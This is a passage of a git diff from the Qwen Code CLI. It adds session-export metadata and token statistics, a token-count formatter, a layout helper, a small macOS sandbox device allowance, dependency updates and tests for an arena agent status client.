0; + } + // Only update lastValidRecord when BOTH values are present in the same record + if ( + record.usageMetadata?.totalTokenCount !== undefined && + record.contextWindowSize !== undefined + ) { + lastValidRecord = { + totalTokenCount: record.usageMetadata.totalTokenCount, + contextWindowSize: record.contextWindowSize, + }; + } + } + + // Include TaskTool token usage from executionSummary + const taskTokens = extractTaskToolTokens(record); + if (taskTokens > 0) { + totalTokens += taskTokens; + } + } + + // Use last valid record's values for context usage calculation + // This represents how much of the context window is being used by the total tokens + if (lastValidRecord) { + const percent = + (lastValidRecord.totalTokenCount / lastValidRecord.contextWindowSize) * + 100; + return { + totalTokens, + contextUsagePercent: Math.round(percent * 10) / 10, + contextWindowSize: lastValidRecord.contextWindowSize, + }; + } + + // Fallback: return the contextWindowSize from the last assistant record even if no valid pair found + // (for display purposes only, without percentage) + const lastAssistantRecord = [...records] + .reverse() + .find((r) => r.type === 'assistant' && r.contextWindowSize !== undefined); + + return { + totalTokens, + contextWindowSize: lastAssistantRecord?.contextWindowSize, + }; +} + +/** + * Extract session metadata from ChatRecords. + */ +async function extractMetadata( + conversation: { + sessionId: string; + startTime: string; + messages: ChatRecord[]; + }, + config: Config, +): Promise { + const { sessionId, startTime, messages } = conversation; + + // Extract basic info from the first record + const firstRecord = messages[0]; + const cwd = firstRecord?.cwd ?? 
''; + const gitBranch = firstRecord?.gitBranch; + + // Get git repository name + let gitRepo: string | undefined; + if (cwd) { + const { getGitRepoName } = await import('@qwen-code/qwen-code-core'); + gitRepo = getGitRepoName(cwd); + } + + // Try to get model from assistant messages + let model: string | undefined; + for (const record of messages) { + if (record.type === 'assistant' && record.model) { + model = record.model; + break; + } + } + + // Get channel from config + const channel = config.getChannel?.(); + + // Count user prompts + const promptCount = messages.filter((m) => m.type === 'user').length; + + // Calculate file stats from original ChatRecords + const fileStats = calculateFileStats(messages); + + // Calculate token stats from original ChatRecords + // contextWindowSize is retrieved from the last assistant record for accuracy + const tokenStats = calculateTokenStats(messages); + + return { + sessionId, + startTime, + exportTime: new Date().toISOString(), + cwd, + gitRepo, + gitBranch, + model, + channel, + promptCount, + contextUsagePercent: tokenStats.contextUsagePercent, + contextWindowSize: tokenStats.contextWindowSize, + totalTokens: tokenStats.totalTokens, + filesWritten: fileStats.writtenFilePaths.size, + linesAdded: fileStats.linesAdded, + linesRemoved: fileStats.linesRemoved, + uniqueFiles: Array.from(fileStats.writtenFilePaths), + }; +} /** * Export session context that captures session updates into export messages. 
@@ -24,6 +409,7 @@ class ExportSessionContext implements SessionContext { role: 'user' | 'assistant' | 'thinking'; parts: Array<{ text: string }>; timestamp: number; + usageMetadata?: GenerateContentResponseUsageMetadata; } | null = null; private activeRecordId: string | null = null; private activeRecordTimestamp: string | null = null; @@ -39,9 +425,37 @@ class ExportSessionContext implements SessionContext { case 'user_message_chunk': this.handleMessageChunk('user', update.content); break; - case 'agent_message_chunk': - this.handleMessageChunk('assistant', update.content); + case 'agent_message_chunk': { + // Extract usageMetadata from _meta if available + const usageMeta = update._meta as + | { + usage?: { + inputTokens?: number; + outputTokens?: number; + totalTokens?: number; + thoughtTokens?: number; + cachedReadTokens?: number; + }; + } + | undefined; + const usageMetadata: GenerateContentResponseUsageMetadata | undefined = + usageMeta?.usage + ? { + promptTokenCount: usageMeta.usage.inputTokens, + candidatesTokenCount: usageMeta.usage.outputTokens, + totalTokenCount: usageMeta.usage.totalTokens, + thoughtsTokenCount: usageMeta.usage.thoughtTokens, + cachedContentTokenCount: usageMeta.usage.cachedReadTokens, + } + : undefined; + this.handleMessageChunk( + 'assistant', + update.content, + 'assistant', + usageMetadata, + ); break; + } case 'agent_thought_chunk': this.handleMessageChunk('assistant', update.content, 'thinking'); break; @@ -79,6 +493,7 @@ class ExportSessionContext implements SessionContext { role: 'user' | 'assistant', content: { type: string; text?: string }, messageRole: 'user' | 'assistant' | 'thinking' = role, + usageMetadata?: GenerateContentResponseUsageMetadata, ): void { if (content.type !== 'text' || !content.text) return; @@ -98,12 +513,17 @@ class ExportSessionContext implements SessionContext { this.currentMessage.role === messageRole ) { this.currentMessage.parts.push({ text: content.text }); + // Merge usageMetadata if provided 
(for assistant messages) + if (usageMetadata && role === 'assistant') { + this.currentMessage.usageMetadata = usageMetadata; + } } else { this.currentMessage = { type: role, role: messageRole, parts: [{ text: content.text }], timestamp: Date.now(), + ...(usageMetadata && role === 'assistant' ? { usageMetadata } : {}), }; } } @@ -205,7 +625,7 @@ class ExportSessionContext implements SessionContext { if (!this.currentMessage) return; const uuid = this.getMessageUuid(); - this.messages.push({ + const exportMessage: ExportMessage = { uuid, sessionId: this.sessionId, timestamp: this.getMessageTimestamp(), @@ -214,7 +634,17 @@ class ExportSessionContext implements SessionContext { role: this.currentMessage.role, parts: this.currentMessage.parts, }, - }); + }; + + // Add usageMetadata for assistant messages + if ( + this.currentMessage.type === 'assistant' && + this.currentMessage.usageMetadata + ) { + exportMessage.usageMetadata = this.currentMessage.usageMetadata; + } + + this.messages.push(exportMessage); this.currentMessage = null; } @@ -258,9 +688,13 @@ export async function collectSessionData( // Get the export messages const messages = exportContext.getMessages(); + // Extract metadata from conversation + const metadata = await extractMetadata(conversation, config); + return { sessionId: conversation.sessionId, startTime: conversation.startTime, messages, + metadata, }; } diff --git a/packages/cli/src/ui/utils/export/formatters/html.ts b/packages/cli/src/ui/utils/export/formatters/html.ts index b4b72fb39..3fb4b9914 100644 --- a/packages/cli/src/ui/utils/export/formatters/html.ts +++ b/packages/cli/src/ui/utils/export/formatters/html.ts @@ -36,6 +36,7 @@ export function injectDataIntoHtmlTemplate( sessionId: string; startTime: string; messages: unknown[]; + metadata?: unknown; }, ): string { const jsonData = JSON.stringify(data, null, 2); diff --git a/packages/cli/src/ui/utils/export/formatters/jsonl.ts b/packages/cli/src/ui/utils/export/formatters/jsonl.ts index 
57dcfeb8b..4de132bb1 100644 --- a/packages/cli/src/ui/utils/export/formatters/jsonl.ts +++ b/packages/cli/src/ui/utils/export/formatters/jsonl.ts @@ -12,15 +12,60 @@ import type { ExportSessionData } from '../types.js'; */ export function toJsonl(sessionData: ExportSessionData): string { const lines: string[] = []; + const sourceMetadata = sessionData.metadata; // Add session metadata as the first line - lines.push( - JSON.stringify({ - type: 'session_metadata', - sessionId: sessionData.sessionId, - startTime: sessionData.startTime, - }), - ); + const metadata: Record = { + type: 'session_metadata', + sessionId: sessionData.sessionId, + startTime: sessionData.startTime, + }; + + // Add all metadata fields if available + if (sourceMetadata?.exportTime) { + metadata['exportTime'] = sourceMetadata.exportTime; + } + if (sourceMetadata?.cwd) { + metadata['cwd'] = sourceMetadata.cwd; + } + if (sourceMetadata?.gitRepo) { + metadata['gitRepo'] = sourceMetadata.gitRepo; + } + if (sourceMetadata?.gitBranch) { + metadata['gitBranch'] = sourceMetadata.gitBranch; + } + if (sourceMetadata?.model) { + metadata['model'] = sourceMetadata.model; + } + if (sourceMetadata?.channel) { + metadata['channel'] = sourceMetadata.channel; + } + if (sourceMetadata?.promptCount !== undefined) { + metadata['promptCount'] = sourceMetadata.promptCount; + } + if (sourceMetadata?.contextUsagePercent !== undefined) { + metadata['contextUsagePercent'] = sourceMetadata.contextUsagePercent; + } + if (sourceMetadata?.contextWindowSize !== undefined) { + metadata['contextWindowSize'] = sourceMetadata.contextWindowSize; + } + if (sourceMetadata?.totalTokens !== undefined) { + metadata['totalTokens'] = sourceMetadata.totalTokens; + } + if (sourceMetadata?.filesWritten !== undefined) { + metadata['filesWritten'] = sourceMetadata.filesWritten; + } + if (sourceMetadata?.linesAdded !== undefined) { + metadata['linesAdded'] = sourceMetadata.linesAdded; + } + if (sourceMetadata?.linesRemoved !== undefined) { + 
metadata['linesRemoved'] = sourceMetadata.linesRemoved; + } + if (sourceMetadata?.uniqueFiles && sourceMetadata.uniqueFiles.length > 0) { + metadata['uniqueFiles'] = sourceMetadata.uniqueFiles; + } + + lines.push(JSON.stringify(metadata)); // Add each message as a separate line for (const message of sessionData.messages) { diff --git a/packages/cli/src/ui/utils/export/formatters/markdown.ts b/packages/cli/src/ui/utils/export/formatters/markdown.ts index deb520cad..6ee18a754 100644 --- a/packages/cli/src/ui/utils/export/formatters/markdown.ts +++ b/packages/cli/src/ui/utils/export/formatters/markdown.ts @@ -11,12 +11,82 @@ import type { ExportSessionData, ExportMessage } from '../types.js'; */ export function toMarkdown(sessionData: ExportSessionData): string { const lines: string[] = []; + const metadata = sessionData.metadata; // Add header with metadata lines.push('# Chat Session Export\n'); lines.push(`- **Session ID**: \`${sanitizeText(sessionData.sessionId)}\``); lines.push(`- **Start Time**: ${sanitizeText(sessionData.startTime)}`); - lines.push(`- **Exported**: ${new Date().toISOString()}`); + lines.push( + `- **Exported**: ${sanitizeText(metadata?.exportTime ?? 
new Date().toISOString())}`, + ); + + lines.push(''); + + // Add context info + if (metadata?.cwd) { + lines.push(`- **Working Directory**: \`${sanitizeText(metadata.cwd)}\``); + } + if (metadata?.gitRepo) { + lines.push(`- **Git Repository**: ${sanitizeText(metadata.gitRepo)}`); + } + if (metadata?.gitBranch) { + lines.push(`- **Git Branch**: \`${sanitizeText(metadata.gitBranch)}\``); + } + + lines.push(''); + + // Add model info + if (metadata?.model) { + lines.push(`- **Model**: ${sanitizeText(metadata.model)}`); + } + if (metadata?.channel) { + lines.push(`- **Channel**: ${sanitizeText(metadata.channel)}`); + } + if (metadata?.promptCount !== undefined) { + lines.push(`- **Prompt Count**: ${metadata.promptCount}`); + } + + lines.push(''); + + // Add token stats + if (metadata?.totalTokens !== undefined) { + lines.push(`- **Total Tokens**: ${metadata.totalTokens}`); + } + if (metadata?.contextWindowSize !== undefined) { + lines.push(`- **Context Window Size**: ${metadata.contextWindowSize}`); + } + if (metadata?.contextUsagePercent !== undefined) { + lines.push(`- **Context Usage**: ${metadata.contextUsagePercent}%`); + } + + lines.push(''); + + // Add file operation stats + if (metadata?.filesWritten !== undefined) { + lines.push(`- **Files Written**: ${metadata.filesWritten}`); + } + if (metadata?.linesAdded !== undefined) { + lines.push(`- **Lines Added**: ${metadata.linesAdded}`); + } + if (metadata?.linesRemoved !== undefined) { + lines.push(`- **Lines Removed**: ${metadata.linesRemoved}`); + } + + // Add unique files list if available + if (metadata?.uniqueFiles && metadata.uniqueFiles.length > 0) { + lines.push(''); + lines.push('
'); + lines.push( + `Unique Files Referenced (${metadata.uniqueFiles.length})`, + ); + lines.push(''); + for (const file of metadata.uniqueFiles) { + lines.push(`- \`${sanitizeText(file)}\``); + } + lines.push('
'); + } + lines.push('\n---\n'); // Process each message diff --git a/packages/cli/src/ui/utils/export/normalize.ts b/packages/cli/src/ui/utils/export/normalize.ts index c2236dd3c..cf9f80cdc 100644 --- a/packages/cli/src/ui/utils/export/normalize.ts +++ b/packages/cli/src/ui/utils/export/normalize.ts @@ -28,6 +28,14 @@ export function normalizeSessionData( } }); + // Build index of assistant messages by uuid for usageMetadata merging + const assistantMessageIndexByUuid = new Map(); + normalized.forEach((message, index) => { + if (message.type === 'assistant') { + assistantMessageIndexByUuid.set(message.uuid, index); + } + }); + // Merge tool result information into tool call messages for (const record of originalRecords) { if (record.type !== 'tool_result') continue; @@ -58,6 +66,20 @@ export function normalizeSessionData( mergeToolCallData(existingMessage.toolCall, toolCallMessage.toolCall); } + // Merge usageMetadata from assistant records + for (const record of originalRecords) { + if (record.type !== 'assistant') continue; + if (!record.usageMetadata) continue; + + const existingIndex = assistantMessageIndexByUuid.get(record.uuid); + if (existingIndex !== undefined) { + // Only set if not already present from collect phase + if (!normalized[existingIndex].usageMetadata) { + normalized[existingIndex].usageMetadata = record.usageMetadata; + } + } + } + return { ...sessionData, messages: normalized, diff --git a/packages/cli/src/ui/utils/export/types.ts b/packages/cli/src/ui/utils/export/types.ts index e71612615..3148fb386 100644 --- a/packages/cli/src/ui/utils/export/types.ts +++ b/packages/cli/src/ui/utils/export/types.ts @@ -4,6 +4,8 @@ * SPDX-License-Identifier: Apache-2.0 */ +import type { GenerateContentResponseUsageMetadata } from '@google/genai'; + /** * Universal export message format - SSOT for all export formats. * This is format-agnostic and contains all information needed for any export type. 
@@ -25,6 +27,9 @@ export interface ExportMessage { /** Model used for assistant messages */ model?: string; + /** Token usage for this message (mainly for assistant messages) */ + usageMetadata?: GenerateContentResponseUsageMetadata; + /** For tool_call messages */ toolCall?: { toolCallId: string; @@ -44,6 +49,44 @@ export interface ExportMessage { }; } +/** + * Metadata for export session - contains aggregated statistics and session context. + */ +export interface ExportMetadata { + /** Session ID */ + sessionId: string; + /** ISO timestamp when session started */ + startTime: string; + /** Export timestamp */ + exportTime: string; + /** Current working directory */ + cwd: string; + /** Git repository name, if available */ + gitRepo?: string; + /** Git branch name, if available */ + gitBranch?: string; + /** Model used in the session */ + model?: string; + /** Channel/source identifier */ + channel?: string; + /** Number of user prompts in the session */ + promptCount: number; + /** Context window utilization percentage (0-100) */ + contextUsagePercent?: number; + /** Context window size in tokens (used for calculating percentage) */ + contextWindowSize?: number; + /** Total tokens used (prompt + completion) */ + totalTokens?: number; + /** Number of files written/edited */ + filesWritten?: number; + /** Lines of code added */ + linesAdded?: number; + /** Lines of code removed */ + linesRemoved?: number; + /** Unique files referenced in the session (written files only) */ + uniqueFiles: string[]; +} + /** * Complete export session data - the single source of truth. 
*/ @@ -51,4 +94,6 @@ export interface ExportSessionData { sessionId: string; startTime: string; messages: ExportMessage[]; + /** Session metadata and statistics */ + metadata?: ExportMetadata; } diff --git a/packages/cli/src/ui/utils/formatters.test.ts b/packages/cli/src/ui/utils/formatters.test.ts index 34bf67e26..09173e10e 100644 --- a/packages/cli/src/ui/utils/formatters.test.ts +++ b/packages/cli/src/ui/utils/formatters.test.ts @@ -9,6 +9,7 @@ import { formatDuration, formatMemoryUsage, formatRelativeTime, + formatTokenCount, } from './formatters.js'; describe('formatters', () => { @@ -154,4 +155,25 @@ describe('formatters', () => { expect(formatDuration(-100)).toBe('0s'); }); }); + + describe('formatTokenCount', () => { + it('should display exact number for counts less than 1000', () => { + expect(formatTokenCount(0)).toBe('0'); + expect(formatTokenCount(100)).toBe('100'); + expect(formatTokenCount(847)).toBe('847'); + expect(formatTokenCount(999)).toBe('999'); + }); + + it('should display with k suffix and one decimal for counts 1000-9999', () => { + expect(formatTokenCount(1000)).toBe('1.0k'); + expect(formatTokenCount(5400)).toBe('5.4k'); + expect(formatTokenCount(9999)).toBe('10.0k'); + }); + + it('should display with k suffix without decimal for counts 10000 and above', () => { + expect(formatTokenCount(10000)).toBe('10k'); + expect(formatTokenCount(15000)).toBe('15k'); + expect(formatTokenCount(100000)).toBe('100k'); + }); + }); }); diff --git a/packages/cli/src/ui/utils/formatters.ts b/packages/cli/src/ui/utils/formatters.ts index b65cefe18..38afaaa30 100644 --- a/packages/cli/src/ui/utils/formatters.ts +++ b/packages/cli/src/ui/utils/formatters.ts @@ -55,6 +55,16 @@ export const formatRelativeTime = (timestamp: number): string => { return 'just now'; }; +export const formatTokenCount = (count: number): string => { + if (count < 1000) { + return `${count}`; + } + if (count < 10000) { + return `${(count / 1000).toFixed(1)}k`; + } + return 
`${Math.floor(count / 1000)}k`; +}; + export const formatDuration = (milliseconds: number): string => { if (milliseconds <= 0) { return '0s'; diff --git a/packages/cli/src/ui/utils/layoutUtils.ts b/packages/cli/src/ui/utils/layoutUtils.ts new file mode 100644 index 000000000..208babcfc --- /dev/null +++ b/packages/cli/src/ui/utils/layoutUtils.ts @@ -0,0 +1,40 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * @fileoverview Shared layout calculation utilities for the terminal UI. + */ + +/** + * Calculate the widths for the input prompt area based on terminal width. + * + * Returns the content width (for the text buffer), the total container width + * (including border + padding + prefix), the suggestions dropdown width, + * and the frame overhead constant. + */ +export const calculatePromptWidths = (terminalWidth: number) => { + const widthFraction = 0.9; + const FRAME_PADDING_AND_BORDER = 4; // Border (2) + padding (2) + const PROMPT_PREFIX_WIDTH = 2; // '> ' or '! 
' + const MIN_CONTENT_WIDTH = 2; + + const innerContentWidth = + Math.floor(terminalWidth * widthFraction) - + FRAME_PADDING_AND_BORDER - + PROMPT_PREFIX_WIDTH; + + const inputWidth = Math.max(MIN_CONTENT_WIDTH, innerContentWidth); + const FRAME_OVERHEAD = FRAME_PADDING_AND_BORDER + PROMPT_PREFIX_WIDTH; + const containerWidth = inputWidth + FRAME_OVERHEAD; + const suggestionsWidth = Math.max(20, Math.floor(terminalWidth * 1.0)); + + return { + inputWidth, + containerWidth, + suggestionsWidth, + frameOverhead: FRAME_OVERHEAD, + } as const; +}; diff --git a/packages/cli/src/utils/sandbox-macos-permissive-open.sb b/packages/cli/src/utils/sandbox-macos-permissive-open.sb index b0da94f7f..bc2087481 100644 --- a/packages/cli/src/utils/sandbox-macos-permissive-open.sb +++ b/packages/cli/src/utils/sandbox-macos-permissive-open.sb @@ -22,4 +22,6 @@ (literal "/dev/stdout") (literal "/dev/stderr") (literal "/dev/null") -) \ No newline at end of file + (literal "/dev/ptmx") + (regex #"^/dev/ttys[0-9]*$") +) diff --git a/packages/core/package.json b/packages/core/package.json index c66f51a93..cca5ef21c 100644 --- a/packages/core/package.json +++ b/packages/core/package.json @@ -1,6 +1,6 @@ { "name": "@qwen-code/qwen-code-core", - "version": "0.12.3", + "version": "0.13.0", "description": "Qwen Code Core", "repository": { "type": "git", @@ -25,6 +25,7 @@ "dependencies": { "@anthropic-ai/sdk": "^0.36.1", "@google/genai": "1.30.0", + "@iarna/toml": "^2.2.5", "@modelcontextprotocol/sdk": "^1.25.1", "@opentelemetry/api": "^1.9.0", "@opentelemetry/exporter-logs-otlp-grpc": "^0.203.0", @@ -37,7 +38,6 @@ "@opentelemetry/sdk-node": "^0.203.0", "@types/html-to-text": "^9.0.4", "@xterm/headless": "5.5.0", - "@iarna/toml": "^2.2.5", "ajv": "^8.17.1", "ajv-formats": "^3.0.0", "async-mutex": "^0.5.0", @@ -46,6 +46,7 @@ "chokidar": "^4.0.3", "diff": "^7.0.0", "dotenv": "^17.1.0", + "extract-zip": "^2.0.1", "fast-levenshtein": "^2.0.6", "fast-uri": "^3.0.6", "fdir": "^6.4.6", @@ -61,15 +62,15 
@@ "mnemonist": "^0.40.3", "open": "^10.1.2", "openai": "5.11.0", - "prompts": "^2.4.2", "picomatch": "^4.0.1", + "prompts": "^2.4.2", "shell-quote": "^1.8.3", "simple-git": "^3.28.0", "strip-ansi": "^7.1.0", "tar": "^7.5.2", - "extract-zip": "^2.0.1", "undici": "^6.22.0", "uuid": "^9.0.1", + "web-tree-sitter": "^0.24.7", "ws": "^8.18.0" }, "optionalDependencies": { @@ -87,10 +88,11 @@ "@types/fast-levenshtein": "^0.0.4", "@types/minimatch": "^5.1.2", "@types/picomatch": "^4.0.1", - "@types/ws": "^8.5.10", - "@types/tar": "^6.1.13", "@types/prompts": "^2.4.9", + "@types/tar": "^6.1.13", + "@types/ws": "^8.5.10", "msw": "^2.3.4", + "tree-sitter-wasms": "^0.1.13", "typescript": "^5.3.3", "vitest": "^3.1.1" }, diff --git a/packages/core/src/agents/arena/ArenaAgentClient.test.ts b/packages/core/src/agents/arena/ArenaAgentClient.test.ts new file mode 100644 index 000000000..6ab61039c --- /dev/null +++ b/packages/core/src/agents/arena/ArenaAgentClient.test.ts @@ -0,0 +1,568 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +import { describe, it, expect, beforeEach, afterEach, vi } from 'vitest'; +import * as fs from 'node:fs/promises'; +import * as path from 'node:path'; +import * as os from 'node:os'; +import { ArenaAgentClient } from './ArenaAgentClient.js'; +import { safeAgentId } from './types.js'; +import type { ArenaControlSignal } from './types.js'; +import { uiTelemetryService } from '../../telemetry/uiTelemetry.js'; +import type { SessionMetrics } from '../../telemetry/uiTelemetry.js'; +import { ToolCallDecision } from '../../telemetry/tool-call-decision.js'; + +const createMockMetrics = ( + overrides: Partial<{ + totalRequests: number; + totalTokens: number; + promptTokens: number; + candidatesTokens: number; + totalLatencyMs: number; + totalCalls: number; + totalSuccess: number; + totalFail: number; + }> = {}, +): SessionMetrics => ({ + models: { + 'test-model': { + api: { + totalRequests: overrides.totalRequests 
?? 0, + totalErrors: 0, + totalLatencyMs: overrides.totalLatencyMs ?? 0, + }, + tokens: { + prompt: overrides.promptTokens ?? 0, + candidates: overrides.candidatesTokens ?? 0, + total: overrides.totalTokens ?? 0, + cached: 0, + thoughts: 0, + tool: 0, + }, + }, + }, + tools: { + totalCalls: overrides.totalCalls ?? 0, + totalSuccess: overrides.totalSuccess ?? 0, + totalFail: overrides.totalFail ?? 0, + totalDurationMs: 0, + totalDecisions: { + [ToolCallDecision.ACCEPT]: 0, + [ToolCallDecision.REJECT]: 0, + [ToolCallDecision.MODIFY]: 0, + [ToolCallDecision.AUTO_ACCEPT]: 0, + }, + byName: {}, + }, + files: { + totalLinesAdded: 0, + totalLinesRemoved: 0, + }, +}); + +describe('ArenaAgentClient', () => { + let tempDir: string; + + beforeEach(async () => { + tempDir = await fs.mkdtemp(path.join(os.tmpdir(), 'arena-reporter-test-')); + vi.spyOn(uiTelemetryService, 'getMetrics').mockReturnValue( + createMockMetrics(), + ); + }); + + afterEach(async () => { + vi.restoreAllMocks(); + try { + await fs.rm(tempDir, { recursive: true, force: true }); + } catch { + // Ignore cleanup errors + } + }); + + describe('create() factory', () => { + it('should return null when ARENA_AGENT_ID is not set', () => { + const original = process.env['ARENA_AGENT_ID']; + const originalSession = process.env['ARENA_SESSION_ID']; + const originalDir = process.env['ARENA_SESSION_DIR']; + delete process.env['ARENA_AGENT_ID']; + delete process.env['ARENA_SESSION_ID']; + delete process.env['ARENA_SESSION_DIR']; + + const reporter = ArenaAgentClient.create(); + expect(reporter).toBeNull(); + + // Restore + if (original !== undefined) { + process.env['ARENA_AGENT_ID'] = original; + } + if (originalSession !== undefined) { + process.env['ARENA_SESSION_ID'] = originalSession; + } + if (originalDir !== undefined) { + process.env['ARENA_SESSION_DIR'] = originalDir; + } + }); + + it('should return null when ARENA_SESSION_ID is not set', () => { + const originalAgent = process.env['ARENA_AGENT_ID']; + const 
originalSession = process.env['ARENA_SESSION_ID']; + const originalDir = process.env['ARENA_SESSION_DIR']; + + process.env['ARENA_AGENT_ID'] = 'test-agent'; + delete process.env['ARENA_SESSION_ID']; + process.env['ARENA_SESSION_DIR'] = tempDir; + + const reporter = ArenaAgentClient.create(); + expect(reporter).toBeNull(); + + // Restore + if (originalAgent !== undefined) { + process.env['ARENA_AGENT_ID'] = originalAgent; + } else { + delete process.env['ARENA_AGENT_ID']; + } + if (originalSession !== undefined) { + process.env['ARENA_SESSION_ID'] = originalSession; + } + if (originalDir !== undefined) { + process.env['ARENA_SESSION_DIR'] = originalDir; + } else { + delete process.env['ARENA_SESSION_DIR']; + } + }); + + it('should return null when ARENA_SESSION_DIR is not set', () => { + const originalAgent = process.env['ARENA_AGENT_ID']; + const originalSession = process.env['ARENA_SESSION_ID']; + const originalDir = process.env['ARENA_SESSION_DIR']; + + process.env['ARENA_AGENT_ID'] = 'test-agent'; + process.env['ARENA_SESSION_ID'] = 'test-session'; + delete process.env['ARENA_SESSION_DIR']; + + const reporter = ArenaAgentClient.create(); + expect(reporter).toBeNull(); + + // Restore + if (originalAgent !== undefined) { + process.env['ARENA_AGENT_ID'] = originalAgent; + } else { + delete process.env['ARENA_AGENT_ID']; + } + if (originalSession !== undefined) { + process.env['ARENA_SESSION_ID'] = originalSession; + } else { + delete process.env['ARENA_SESSION_ID']; + } + if (originalDir !== undefined) { + process.env['ARENA_SESSION_DIR'] = originalDir; + } else { + delete process.env['ARENA_SESSION_DIR']; + } + }); + + it('should return an instance when all env vars are set', () => { + const originalAgent = process.env['ARENA_AGENT_ID']; + const originalSession = process.env['ARENA_SESSION_ID']; + const originalDir = process.env['ARENA_SESSION_DIR']; + + process.env['ARENA_AGENT_ID'] = 'test-agent'; + process.env['ARENA_SESSION_ID'] = 'test-session'; + 
process.env['ARENA_SESSION_DIR'] = tempDir; + + const reporter = ArenaAgentClient.create(); + expect(reporter).toBeInstanceOf(ArenaAgentClient); + + // Restore + if (originalAgent !== undefined) { + process.env['ARENA_AGENT_ID'] = originalAgent; + } else { + delete process.env['ARENA_AGENT_ID']; + } + if (originalSession !== undefined) { + process.env['ARENA_SESSION_ID'] = originalSession; + } else { + delete process.env['ARENA_SESSION_ID']; + } + if (originalDir !== undefined) { + process.env['ARENA_SESSION_DIR'] = originalDir; + } else { + delete process.env['ARENA_SESSION_DIR']; + } + }); + }); + + describe('init()', () => { + it('should create the agents/ and control/ directories', async () => { + const reporter = new ArenaAgentClient('agent-1', tempDir); + await reporter.init(); + + const agentsDir = path.join(tempDir, 'agents'); + const controlDir = path.join(tempDir, 'control'); + const agentsStat = await fs.stat(agentsDir); + const controlStat = await fs.stat(controlDir); + expect(agentsStat.isDirectory()).toBe(true); + expect(controlStat.isDirectory()).toBe(true); + }); + + it('should be idempotent', async () => { + const reporter = new ArenaAgentClient('agent-1', tempDir); + await reporter.init(); + await reporter.init(); // Should not throw + + const agentsDir = path.join(tempDir, 'agents'); + const stat = await fs.stat(agentsDir); + expect(stat.isDirectory()).toBe(true); + }); + }); + + describe('updateStatus()', () => { + it('should write per-agent status file with stats from telemetry', async () => { + const agentId = 'model-a'; + const reporter = new ArenaAgentClient(agentId, tempDir); + await reporter.init(); + + vi.mocked(uiTelemetryService.getMetrics).mockReturnValue( + createMockMetrics({ + totalRequests: 3, + totalTokens: 1500, + promptTokens: 1000, + candidatesTokens: 500, + totalCalls: 7, + totalSuccess: 6, + totalFail: 1, + }), + ); + + await reporter.updateStatus('Editing files'); + + const statusPath = path.join( + tempDir, + 'agents', + 
`${safeAgentId(agentId)}.json`, + ); + const content = JSON.parse(await fs.readFile(statusPath, 'utf-8')); + + expect(content.agentId).toBe(agentId); + expect(content.status).toBe('running'); + expect(content.rounds).toBe(3); + expect(content.currentActivity).toBe('Editing files'); + expect(content.stats.totalTokens).toBe(1500); + expect(content.stats.inputTokens).toBe(1000); + expect(content.stats.outputTokens).toBe(500); + expect(content.stats.toolCalls).toBe(7); + expect(content.stats.successfulToolCalls).toBe(6); + expect(content.stats.failedToolCalls).toBe(1); + expect(content.finalSummary).toBeNull(); + expect(content.error).toBeNull(); + expect(content.updatedAt).toBeTypeOf('number'); + }); + + it('should perform atomic write (no partial reads)', async () => { + const agentId = 'model-a'; + const reporter = new ArenaAgentClient(agentId, tempDir); + await reporter.init(); + + // Write status multiple times rapidly + const promises = []; + for (let i = 0; i < 10; i++) { + promises.push(reporter.updateStatus()); + } + await Promise.all(promises); + + // The file should be valid JSON (no corruption from concurrent writes) + const statusPath = path.join( + tempDir, + 'agents', + `${safeAgentId(agentId)}.json`, + ); + const content = JSON.parse(await fs.readFile(statusPath, 'utf-8')); + expect(content.agentId).toBe(agentId); + expect(content.status).toBe('running'); + }); + + it('should reflect latest telemetry on each call', async () => { + const agentId = 'model-a'; + const reporter = new ArenaAgentClient(agentId, tempDir); + await reporter.init(); + + // First update + vi.mocked(uiTelemetryService.getMetrics).mockReturnValue( + createMockMetrics({ + totalRequests: 1, + totalTokens: 100, + totalCalls: 5, + }), + ); + await reporter.updateStatus(); + + // Second update with updated telemetry + vi.mocked(uiTelemetryService.getMetrics).mockReturnValue( + createMockMetrics({ + totalRequests: 2, + totalTokens: 200, + totalCalls: 8, + }), + ); + await 
reporter.updateStatus(); + + const statusPath = path.join( + tempDir, + 'agents', + `${safeAgentId(agentId)}.json`, + ); + const content = JSON.parse(await fs.readFile(statusPath, 'utf-8')); + + expect(content.rounds).toBe(2); + expect(content.stats.totalTokens).toBe(200); + expect(content.stats.toolCalls).toBe(8); + }); + + it('should auto-initialize if not yet initialized', async () => { + const agentId = 'model-a'; + const reporter = new ArenaAgentClient(agentId, tempDir); + // Skip init() call + + await reporter.updateStatus(); + + const statusPath = path.join( + tempDir, + 'agents', + `${safeAgentId(agentId)}.json`, + ); + const content = JSON.parse(await fs.readFile(statusPath, 'utf-8')); + expect(content.agentId).toBe(agentId); + }); + }); + + describe('checkControlSignal()', () => { + it('should return null when no control file exists', async () => { + const agentId = 'model-a'; + const reporter = new ArenaAgentClient(agentId, tempDir); + await reporter.init(); + + const signal = await reporter.checkControlSignal(); + expect(signal).toBeNull(); + }); + + it('should read and delete control file', async () => { + const agentId = 'model-a'; + const reporter = new ArenaAgentClient(agentId, tempDir); + await reporter.init(); + + // Write a control signal + const controlSignal: ArenaControlSignal = { + type: 'shutdown', + reason: 'User cancelled', + timestamp: Date.now(), + }; + const controlPath = path.join( + tempDir, + 'control', + `${safeAgentId(agentId)}.json`, + ); + await fs.writeFile(controlPath, JSON.stringify(controlSignal), 'utf-8'); + + // Read it + const signal = await reporter.checkControlSignal(); + expect(signal).not.toBeNull(); + expect(signal!.type).toBe('shutdown'); + expect(signal!.reason).toBe('User cancelled'); + + // File should be deleted (consumed) + await expect(fs.access(controlPath)).rejects.toThrow(); + }); + + it('should return null on subsequent reads (consume-once)', async () => { + const agentId = 'model-a'; + const reporter = new 
